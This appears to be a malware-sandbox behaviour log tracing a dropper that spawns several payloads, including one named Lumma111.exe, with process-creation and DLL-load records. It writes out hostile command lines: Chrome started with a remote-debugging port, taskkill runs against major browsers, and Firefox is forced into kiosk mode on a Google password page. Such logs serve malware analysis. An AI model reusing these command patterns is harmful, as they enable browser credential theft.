Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe "C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe "C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe "C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe "C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe "C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe "C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe"
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2800 --field-trial-handle=2472,i,16605416690938131637,11171978331131266651,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: unknown Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe "C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2300 -parentBuildID 20230927232528 -prefsHandle 2228 -prefMapHandle 2212 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c9bfa6f4-5706-4739-9566-52a3cba8771f} 6176 "\\.\pipe\gecko-crash-server-pipe.6176" 1994546a710 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3680 -parentBuildID 20230927232528 -prefsHandle 3544 -prefMapHandle 3364 -prefsLen 26143 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d4e17abc-4329-41b2-ac0f-990e55a3f15c} 6176 "\\.\pipe\gecko-crash-server-pipe.6176" 19955ba9e10 rdd
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe "C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe "C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe"
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe "C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe "C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe "C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe "C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe "C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe "C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe "C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe"
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2800 --field-trial-handle=2472,i,16605416690938131637,11171978331131266651,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2300 -parentBuildID 20230927232528 -prefsHandle 2228 -prefMapHandle 2212 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c9bfa6f4-5706-4739-9566-52a3cba8771f} 6176 "\\.\pipe\gecko-crash-server-pipe.6176" 1994546a710 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3680 -parentBuildID 20230927232528 -prefsHandle 3544 -prefMapHandle 3364 -prefsLen 26143 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d4e17abc-4329-41b2-ac0f-990e55a3f15c} 6176 "\\.\pipe\gecko-crash-server-pipe.6176" 19955ba9e10 rdd
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mstask.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dui70.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: duser.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: chartv.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: atlthunk.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winsta.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: explorerframe.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: mskeyprotect.dll Jump to behavior
